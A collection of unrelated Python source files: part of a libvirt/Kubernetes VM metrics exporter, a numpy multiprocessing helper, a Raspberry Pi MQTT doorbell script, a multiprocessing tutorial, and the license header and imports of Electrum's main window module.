vm_disk_read_requests_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_read_requests_per_secend'])
vm_disk_read_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_read_bytes_per_secend'])
vm_disk_write_requests_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_write_requests_per_secend'])
vm_disk_write_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_write_bytes_per_secend'])
for net_metrics in resource_utilization['networks_metrics']:
vm_network_receive_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_bytes_per_secend'])
vm_network_receive_drops_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_drops_per_secend'])
vm_network_receive_errors_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_errors_per_secend'])
vm_network_receive_packages_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_packages_per_secend'])
vm_network_send_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_bytes_per_secend'])
vm_network_send_drops_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_drops_per_secend'])
vm_network_send_errors_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_errors_per_secend'])
vm_network_send_packages_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_packages_per_secend'])
return resource_utilization
except Exception as e:
raise e
def delete_vm_metrics(vm, zone):
global LAST_TAGS
global LAST_RESOURCE_UTILIZATION
if vm in LAST_TAGS.keys() and vm in LAST_RESOURCE_UTILIZATION.keys():
tags = LAST_TAGS[vm]
disk_metrics = LAST_RESOURCE_UTILIZATION[vm]['disks_metrics']
network_metrics = LAST_RESOURCE_UTILIZATION[vm]['networks_metrics']
# zone = tags.get('zone')
host = tags.get('host')
# vm = tags.get('vm')
owner = tags.get('owner')
router = tags.get('router')
autoscalinggroup = tags.get('autoscalinggroup')
cluster = tags.get('cluster')
vm_cpu_idle_rate.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
vm_mem_total_bytes.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
vm_mem_available_bytes.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
vm_mem_buffers_bytes.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
vm_mem_rate.remove(zone, host, vm, owner, router, autoscalinggroup, cluster)
for disks in disk_metrics:
vm_disk_read_requests_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, disks['device'])
vm_disk_read_bytes_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, disks['device'])
vm_disk_write_requests_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, disks['device'])
vm_disk_write_bytes_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, disks['device'])
for nets in network_metrics:
vm_network_receive_bytes_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_receive_drops_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_receive_errors_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_receive_packages_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_send_bytes_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_send_drops_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_send_errors_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
vm_network_send_packages_per_secend.remove(zone, host, vm, owner, router, autoscalinggroup, cluster, nets['device'])
del LAST_TAGS[vm]
del LAST_RESOURCE_UTILIZATION[vm]
else:
logger.warning('failed to delete vm %s data' % vm)
print('failed to delete vm %s data' % vm)
def zero_vm_metrics(vm, zone):
config.load_kube_config(config_file=TOKEN)
labels = get_field_in_kubernetes_by_index(vm, GROUP, VERSION, PLURAL, ['metadata', 'labels'])
# labels_str = dumps(labels)
resource_utilization = {'vm': vm, 'cpu_metrics': {}, 'mem_metrics': {},
'disks_metrics': [], 'networks_metrics': [], 'cluster': labels.get('cluster'), 'router': labels.get('router'),
'owner': labels.get('owner'), 'autoscalinggroup': labels.get('autoscalinggroup')}
resource_utilization['cpu_metrics']['cpu_idle_rate'] = '%.2f' % (1.00)
mem_unused = 0.00
mem_available = 0.00
resource_utilization['mem_metrics']['mem_unused'] = '%.2f' % (mem_unused)
resource_utilization['mem_metrics']['mem_available'] = '%.2f' % (mem_available)
resource_utilization['mem_metrics']['mem_buffers'] = '%.2f' % (0.00)
resource_utilization['mem_metrics']['mem_rate'] = '%.2f' % (0.00)
disks_spec = get_disks_spec(vm)
for disk_spec in disks_spec:
disk_metrics = {}
disk_device = disk_spec[0]
disk_metrics['device'] = disk_device
disk_metrics['disk_read_requests_per_secend'] = '%.2f' % (0.00)
disk_metrics['disk_read_bytes_per_secend'] = '%.2f' % (0.00)
disk_metrics['disk_write_requests_per_secend'] = '%.2f' % (0.00)
disk_metrics['disk_write_bytes_per_secend'] = '%.2f' % (0.00)
resource_utilization['disks_metrics'].append(disk_metrics)
macs = get_macs(vm)
for mac in macs:
net_metrics = {}
net_metrics['device'] = mac.encode('utf-8')
net_metrics['network_read_packages_per_secend'] = '%.2f' % (0.00)
net_metrics['network_read_bytes_per_secend'] = '%.2f' % (0.00)
net_metrics['network_write_packages_per_secend'] = '%.2f' % (0.00)
net_metrics['network_write_bytes_per_secend'] = '%.2f' % (0.00)
net_metrics['network_read_errors_per_secend'] = '%.2f' % (0.00)
net_metrics['network_read_drops_per_secend'] = '%.2f' % (0.00)
net_metrics['network_write_errors_per_secend'] = '%.2f' % (0.00)
net_metrics['network_write_drops_per_secend'] = '%.2f' % (0.00)
resource_utilization['networks_metrics'].append(net_metrics)
vm_cpu_idle_rate.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['cpu_metrics']['cpu_idle_rate'])
vm_mem_total_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_available'])
vm_mem_available_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_unused'])
vm_mem_buffers_bytes.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_buffers'])
vm_mem_rate.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster')).set(resource_utilization['mem_metrics']['mem_rate'])
for disk_metrics in resource_utilization['disks_metrics']:
vm_disk_read_requests_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_read_requests_per_secend'])
vm_disk_read_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_read_bytes_per_secend'])
vm_disk_write_requests_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_write_requests_per_secend'])
vm_disk_write_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), disk_metrics['device']).set(disk_metrics['disk_write_bytes_per_secend'])
for net_metrics in resource_utilization['networks_metrics']:
vm_network_receive_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_bytes_per_secend'])
vm_network_receive_drops_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_drops_per_secend'])
vm_network_receive_errors_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_errors_per_secend'])
vm_network_receive_packages_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_read_packages_per_secend'])
vm_network_send_bytes_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_bytes_per_secend'])
vm_network_send_drops_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_drops_per_secend'])
vm_network_send_errors_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_errors_per_secend'])
vm_network_send_packages_per_secend.labels(zone, HOSTNAME, vm, labels.get('owner'), labels.get('router'), labels.get('autoscalinggroup'), labels.get('cluster'), net_metrics['device']).set(net_metrics['network_write_packages_per_secend'])
return resource_utilization
# def set_vm_mem_period(vm, sec):
# runCmdRaiseException('virsh dommemstat --period %s --domain %s --config --live' % (str(sec), vm))
# def get_resource_collector_threads():
# config.load_kube_config(config_file=TOKEN)
# zone = get_field_in_kubernetes_node(HOSTNAME, ['metadata', 'labels', 'zone'])
# print(zone)
# while True:
# vm_list = list_active_vms()
# for vm in vm_list:
# t = threading.Thread(target=collect_vm_metrics,args=(vm,zone,))
# t.setDaemon(True)
# t.start()
# t1 = threading.Thread(target=collect_storage_metrics,args=(zone,))
# t1.setDaemon(True)
# t1.start()
# # nfs_vdisk_list = list_all_vdisks('/var/lib/libvirt/cstor')
# # for nfs_vdisk in nfs_vdisk_list:
# # t2 = threading.Thread(target=collect_disk_metrics,args=(nfs_vdisk,zone,))
# # t2.setDaemon(True)
# # t2.start()
# time.sleep(5)
@singleton('/var/run/virt_monitor_in_docker.pid')
def main():
# logger.debug("---------------------------------------------------------------------------------")
# logger.debug("------------------------Welcome to Monitor Daemon.-------------------------------")
# logger.debug("------Copyright (2019, ) Institute of Software, Chinese Academy of Sciences------")
# logger.debug("---------author: wuyuewen@otcaix.iscas.ac.cn,liuhe18@otcaix.iscas.ac.cn----------")
# logger.debug("--------------------------------wuheng@otcaix.iscas.ac.cn------------------------")
# logger.debug("---------------------------------------------------------------------------------")
if os.path.exists(TOKEN):
start_http_server(19998)
# registry = CollectorRegistry(auto_describe=False)
config.load_kube_config(config_file=TOKEN)
zone = get_field_in_kubernetes_node(HOSTNAME, ['metadata', 'labels', 'zone'])
while True:
# init(registry)
config.load_kube_config(config_file=TOKEN)
collect_vm_metrics(zone)
# collect_storage_metrics(zone)
time.sleep(10)
if __name__ == '__main__':
main()
# start_http_server(19998)
# config.load_kube_config(config_file=TOKEN)
# zone = get_field_in_kubernetes_node(HOSTNAME, ['metadata', 'labels', 'zone'])
# while True:
# collect_vm_metrics(zone)
# # collect_storage_metrics(zone)
# time.sleep(10)
# print(get_macs("vm006"))
# print get_disks_spec('vmtest222')
# import pprint
# set_vm_mem_period('vm010', 5)
# pprint.pprint(collect_vm_metrics("vm010"))
|
mutiprocessing_util.py
|
from multiprocessing import Process, Manager
import numpy as np
import os
import inspect
class MutiProcessor():
def __init__(self, np_data, h_num=1, w_num=1, cube_func=None):
if len(np_data.shape) < 2:
raise Exception("np_data must at least have dim 2.")
self.np_data = np_data
self.h_size, self.w_size = np_data.shape[:2]
print(">>>>>>>-- self.h_size", self.h_size, ", self.w_size=", self.w_size)
if h_num > self.h_size or w_num > self.w_size:
raise Exception("h_num or w_num must at less then np_data shape {}. but got {}".format(np_data.shape[:2], (h_num, w_num)))
self.h_num, self.w_num = h_num, w_num
print(">>>>>>>-- self.h_num", self.h_num, ", self.w_num=", self.w_num)
self.h_step, self.w_step = self.h_size // self.h_num, self.w_size // self.w_num
print(">>>>>>>-- self.h_step", self.h_step, ", self.w_step=", self.w_step)
self.__cube_func = cube_func
self.__ret_dict = Manager().dict()
def __get_location(self, i, j):
start_h, end_h = i * self.h_step, (i + 1) * self.h_step
start_w, end_w = j * self.w_step, (j + 1) * self.w_step
end_h = end_h if end_h < self.h_size else self.h_size
end_w = end_w if end_w < self.w_size else self.w_size
return (start_h, start_w, end_h, end_w)
def __cube_process(self, i, j):
start_h, start_w, end_h, end_w = self.__get_location(i, j)
cube_input = self.np_data[start_h:end_h, start_w:end_w]
print(">>>>>>>>>__cube_process: ({},{}) = {} start...".format(i, j, cube_input.shape))
cube_output = None
if self.__cube_func:
func_args = inspect.getfullargspec(self.__cube_func).args
if len(func_args) == 1:
cube_output = self.__cube_func(cube_input)
elif len(func_args) == 2:
cube_output = self.__cube_func(cube_input, (start_h, start_w, end_h, end_w))
else:
raise Exception("args num invalid." + str(func_args))
print(">>>>>>>>>__cube_process: ({},{}) = {} end.".format(i, j, cube_output.shape if cube_output is not None else None))
key = "_".join([str(x) for x in (start_h, start_w, end_h, end_w)])
self.__ret_dict[key] = cube_output
def process(self):
_process_list = []
for i in range(self.h_num):
for j in range(self.w_num):
p = Process(target=self.__cube_process, args=(i, j))
p.start()
_process_list.append(p)
for p in _process_list:
p.join()
return self.__ret_dict
if __name__ == '__main__':
img_np = np.arange(10000).reshape(100, 100)
def cube_func(cube_input, locs):
return cube_input  # simplest cube function: return the block unchanged
processor = MutiProcessor(img_np, h_num=5, w_num=5, cube_func=cube_func)
ret = processor.process()
|
tomasan.py
|
#!/usr/bin/env python
# coding=utf-8
# ======== Handles both receiving and sending =========
import os, sys
import RPi.GPIO as GPIO
import paho.mqtt.client as paho
import paho.mqtt.publish as publish
import threading
import time
import pygame.mixer
import wave
import time
import json
time.sleep(0.3)
GPIO.cleanup()
time.sleep(0.3)
# ======= Settings ==============
# Settings file
SETTING_FILE = "/home/pi/project1/setting.json"
#SETTING_FILE = os.abspath.dirname(__file__) + "/setting.json"
#SETTING_FILE = os.path.dirname(__file__) + "/setting.json"
# Load the settings file
with open(SETTING_FILE) as f:
data = json.load(f)
# print data["device_id"]
myName = data["device_id"]
HOST_NAME = data["mqttc_host"] # Mosquitto host
PIN_LED = 11
PIN_BUTTON = 15
led_flag = False
# Sound settings
SOUND_FILE = '/home/pi/project1/sounds/knock.wav' # knock sound file
SOUND_FILE_START = '/home/pi/project1/sounds/start.wav' # startup sound
SOUND_FILE_SEND = '/home/pi/project1/sounds/chime.mp3' # outgoing call (chime) sound
SOUND_LOOP = 3 # loop count
SOUND_SLEEP = 5 # playback duration in seconds
STATUS_PUB = 0
STATUS_SUB = 0
"""
Play the knock sound
"""
# Start the sound playback thread: Sound({loop count}, {playback seconds}, {sound file})
class Sound():
def __init__(self, loop = SOUND_LOOP, sleep = SOUND_SLEEP, file = SOUND_FILE):
self.loop = loop
self.sleep = sleep
self.file = file
self.play_event = threading.Event() # flag: playback requested
self.stop_event = threading.Event() # flag: stop requested
self._started = threading.Event()
self._running = threading.Event()
self._resume = threading.Event()
# Create and start the thread
self._thread = threading.Thread(target = self.target)
self._thread.start()
def target(self):
print("音再生スレッド開始 =================")
if self.running:
self.stop()
self.play()
def play(self):
# """音声を再生させる"""
self.play_event.set()
print("音再生中 =================")
pygame.mixer.init()
pygame.mixer.music.load(self.file)
pygame.mixer.music.play(self.loop) #loop count
time.sleep(self.sleep) #指定秒数秒再生
pygame.mixer.music.stop() #停止
pygame.mixer.quit() #音源への電源停止:サーってノイズを消す
print("音再生完了 =================")
self.stop()
print("音再生スレッド完了 =================")
def stop(self, wait=True):
"""スレッドを停止させる"""
if self.started:
self._running.clear()
# We cannot wait for ourself
if wait and (threading.current_thread() != self._thread):
self._thread.join()
self._started.clear()
self._resume.clear()
@property
def running(self):
""" Whether the thread is running. """
return self._running.is_set()
@property
def started(self):
""" Whether the thread has been started. """
return self._started.is_set()
"""
Blink the LED (fast): accepting a response
"""
def led_on_fast():
global PIN_LED, led_flag
print "--LED ON(はやい)" + str(led_flag)
i = 0
n = 5
if led_flag:
while True:
i = i + 1
if led_flag:
GPIO.output(PIN_LED, True)
time.sleep(0.2)
GPIO.output(PIN_LED, False)
time.sleep(0.2)
GPIO.output(PIN_LED, True)
time.sleep(0.2)
GPIO.output(PIN_LED, False)
time.sleep(0.6)
else:
break
if i >= n:
break
else:
GPIO.output(PIN_LED, False)
print "--LED ON(はやい) 終了"
"""
Blink the LED (slowly): calling
"""
def led_on_slow():
global PIN_LED
print "--LED ON(ゆっくり)"
i = 0
n = 2
if led_flag:
while True:
i = i + 1
if led_flag:
GPIO.output(PIN_LED, True)
time.sleep(0.8)
GPIO.output(PIN_LED, False)
time.sleep(0.4)
else:
break
if i >= n:
break
else:
GPIO.output(PIN_LED, False)
"""
Turn the LED off
"""
def led_off():
global PIN_LED
print "--LED OFF"
GPIO.output(PIN_LED, False)
"""
Publish a message to the server
"""
def publish_mqtt(msg):
global led_flag
try:
print "try publish_mqtt=" + msg
publish.single(
"messageID",
client_id="1",
# clean_session=True,
payload=msg,
hostname=HOST_NAME)
print "publish mqtt time %f"
print "payload=" + msg
except IOError:
print "publish error."
"""
Connection established
"""
def on_connect(mqttc, obj, rc):
mqttc.subscribe("$SYS/#", 0)
print("rc: " + str(rc))
"""
Handle a received message
"""
def on_message(mqttc, obj, msg):
global myName, STATUS_PUB, STATUS_SUB, led_flag, sound_th
# print("msg:"+msg.topic+" "+str(msg.qos)+" "+str(msg.payload))":
if msg.topic == "messageID":
print("knock受付 =================")
yourName = str(msg.payload).split("::")
print("msg.payload = "+ msg.payload )
print("len(yourName) :"+ str(len(yourName)) )
if len(yourName) >= 2 :
print("yourName:"+yourName[1])
if myName != yourName[1]:
print("publish %s" % msg)
sound = Sound() # start the sound playback thread
led_flag = True
led_on_fast()
"""
Information about the published message
"""
def on_publish(mqttc, obj, mid):
print("mid: " + str(mid))
"""
"""
def on_subscribe(mqttc, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
"""
Log output
"""
def on_log(mqttc, obj, level, string):
print("log:" + string)
"""
Thread that watches the GPIO button
"""
def gpio_watch():
global PIN_LED, PIN_BUTTON , STATUS_PUB, led_flag , SOUND_FILE_START, SOUND_FILE_SEND
print "起動音 =================="
sound_start = Sound(1,3, SOUND_FILE_START)
time.sleep(0.2)
print "thred start -- gpio_watch =================="
GPIO.setmode(GPIO.BOARD)
GPIO.setup(PIN_LED, GPIO.OUT)
GPIO.setup(PIN_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
time.sleep(0.2)
GPIO.output(PIN_LED, 1)
time.sleep(0.5)
GPIO.output(PIN_LED, 0)
time.sleep(0.5)
GPIO.output(PIN_LED, 1)
time.sleep(0.5)
GPIO.output(PIN_LED, 0)
# Wait for the button
try:
while True:
ButtonInput = GPIO.input(PIN_BUTTON)
if ButtonInput != True:
print "button pressed"
# send the call
publish_mqtt("knock from ::" + myName)
# start the sound playback thread
sound_send = Sound(1, 2, SOUND_FILE_SEND)
# turn the LED on
led_flag = True
led_on_slow()
else:
# LED OFF
GPIO.output(PIN_LED, 0)
time.sleep(0.11)
time.sleep(0.4)
#program should be finished with "clean" gpio-ports
#when pressing CTRL-c
except KeyboardInterrupt:
print "KeyboardInterrupt Success"
GPIO.cleanup()
except Exception as e:
print e.message
print "Something else"
finally:
print "Finally"
### Run the GPIO loop in a separate thread ###
gpio_th = threading.Thread(target=gpio_watch, name="gpio_th")
time.sleep(0.1)
gpio_th.start()
time.sleep(0.5)
# MQTT client: wait for messages
mqttc = paho.Client()
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_subscribe = on_subscribe
mqttc.connect(HOST_NAME, 1883, 60)
mqttc.subscribe("messageID", 0)
# Start waiting for MQTT messages
try:
mqttc.loop_forever()
#when pressing CTRL-c
except KeyboardInterrupt:
mqttc.loop_stop(force=False) # stop the network loop
GPIO.cleanup()
print "MQTT - loop - KeyboardInterrupt Success"
except Exception as e:
print "MQTT - loop - e.message : " + e.message
except:
print "MQTT - loop - Something else"
finally:
mqttc.loop_stop(force=False)
GPIO.cleanup()
print "MQTT - loop - Finally"
|
processtest.py
|
# coding=utf-8
# @Time : 2017-10.06
# @Author : J.sky
# @Mail : bosichong@qq.com
# @Site : www.17python.com
# @Title : Python concurrent programming (part 1): the multiprocessing module and the Process class
# @Url : http://www.17python.com/blog/34
# @Details : Python concurrent programming (part 1): the multiprocessing module and the Process class
# @Other : OS X 10.11.6
# Python 3.6.1
# VSCode 1.15.1
###################################
# Python concurrent programming (part 1): the multiprocessing module and the Process class
###################################
'''
## Why use multi-process programming in Python?
Because the Python interpreter uses an internal GIL (global interpreter lock), multi-threaded Python code is only allowed to run on a single CPU at any given moment, which limits the concurrency of a program.
When a program is I/O-bound the CPU has plenty of idle time to handle the concurrent threads, so this is usually not a problem. For heavily compute-bound applications, however, using threads for concurrency can degrade performance considerably,
and in that case we need to consider using `Process`-based programming and inter-process communication instead.
## Creating a process with Process
'''
###################################
# Method 1: pass a target function to Process
###################################
# import time, os
# from multiprocessing import Process
# def clock(x,y):
# for i in range(x):
# print('current time == {0}'.format(time.ctime()))
# time.sleep(y)
# if __name__ == '__main__':
# p = Process(target=clock,args=(5,1))
# p.start()
# p.join()
###################################
# Method 2: subclass Process and override run()
###################################
# import time, os
# from multiprocessing import Process
# class ClockProcess(Process):
# def __init__(self,x,y):
# Process.__init__(self)
# self.x=x
# self.y=y
# def run(self):
# for i in range(self.x):
# print('{0}=={1}'.format(os.getpid(),time.ctime()))
# time.sleep(self.y)
# if __name__ == '__main__':
# p = ClockProcess(5,1)
# p1= ClockProcess(5,1)
# p.start()
# p1.start()
# p.join()
# p1.join()
# One way is to create a Process instance and pass it a target function; the other is to subclass Process and override run() with the task to execute. A commented-out sketch combining both styles follows below.
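###################################
# A minimal illustrative sketch combining both creation styles (the names
# `tick` and `TickProcess` are assumptions, not from the original post);
# kept commented out like the method examples above.
###################################
# import time, os
# from multiprocessing import Process
# def tick(n, delay):
#     for _ in range(n):
#         print('{0} tick at {1}'.format(os.getpid(), time.ctime()))
#         time.sleep(delay)
# class TickProcess(Process):
#     def __init__(self, n, delay):
#         Process.__init__(self)
#         self.n, self.delay = n, delay
#     def run(self):
#         tick(self.n, self.delay)
# if __name__ == '__main__':
#     p1 = Process(target=tick, args=(3, 1))
#     p2 = TickProcess(3, 1)
#     p1.start(); p2.start()
#     p1.join(); p2.join()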
###################################
# Method 3: the process pool (Pool)
###################################
# from multiprocessing import Pool
# import os
# def clock(k):
# for i in range(k):
# print('{0} current time == {1}'.format(os.getpid(), time.ctime()))
# time.sleep(k)
# if __name__ == '__main__':
# l = [1 for i in range(20)]  # build the list of tasks with a list comprehension
# with Pool(5) as p:
# p.map(clock,l)
'''
A process pool is a convenient way to create many worker processes, and it is simple to set up and use; choose the creation style that matches how much control your application needs over the workers.
## Communication between processes
Python provides several mechanisms such as `Queue` and `Pipes` for exchanging data. We will use `Queue` as an example to demonstrate inter-process communication and cooperation; a demo of distributed multi-processing will follow later.
`Queue` inter-process communication demo:
'''
###################################
# Queue inter-process communication demo
###################################
import multiprocessing as mp
import time, os
from multiprocessing import Queue  # use multiprocessing's Queue so data can actually be shared between processes
def prt_q(q):
'''Consumer: print data taken from the queue'''
while True:
v = q.get()
print(v)
time.sleep(0.1)
def wrt_q(q):
'''Producer: put data onto the queue'''
for k in ['aa','bb','cc','dd','ee','ff','gg']:
print("{0}已经加入到队列中".format(k))
q.put(k)
time.sleep(0.2)
if __name__ == '__main__':
q = Queue()
wrt_q(q)
p = mp.Process(target=prt_q, args=(q,))
p.start()
p.join()
'''
Using `Queue` is essentially the producer/consumer pattern. The code above never finishes on its own (the consumer blocks forever once the queue is empty), so press `ctrl+c` to force the program to stop.
A very powerful aspect of Python processes is that with just a little configuration they can be turned into distributed multi-processing, which is quite attractive; I will cover distributed multi-processing in a later article. A commented-out sketch of the idea follows below.
'''
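###################################
# A minimal illustrative sketch of the distributed multi-process idea using
# multiprocessing.managers.BaseManager. The queue name, address and authkey
# below are assumptions for the example; it is kept commented out like the
# earlier method examples so the Queue demo above stays the only runnable part.
###################################
# from multiprocessing.managers import BaseManager
# import queue
# task_queue = queue.Queue()
# def _get_task_queue():
#     return task_queue
# class QueueManager(BaseManager):
#     pass
# # server process: expose the queue over the network
# QueueManager.register('get_task_queue', callable=_get_task_queue)
# manager = QueueManager(address=('', 50000), authkey=b'secret')
# manager.start()
# manager.get_task_queue().put('hello from the server')
# # in a separate worker process (possibly on another machine):
# # QueueManager.register('get_task_queue')
# # worker = QueueManager(address=('127.0.0.1', 50000), authkey=b'secret')
# # worker.connect()
# # print(worker.get_task_queue().get())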
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, InvoiceError)
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum.lnutil import PaymentFailure, SENT, RECEIVED
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.util import PR_PAID, PR_UNPAID, PR_INFLIGHT, PR_FAILED
from electrum.util import pr_expiration_values
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
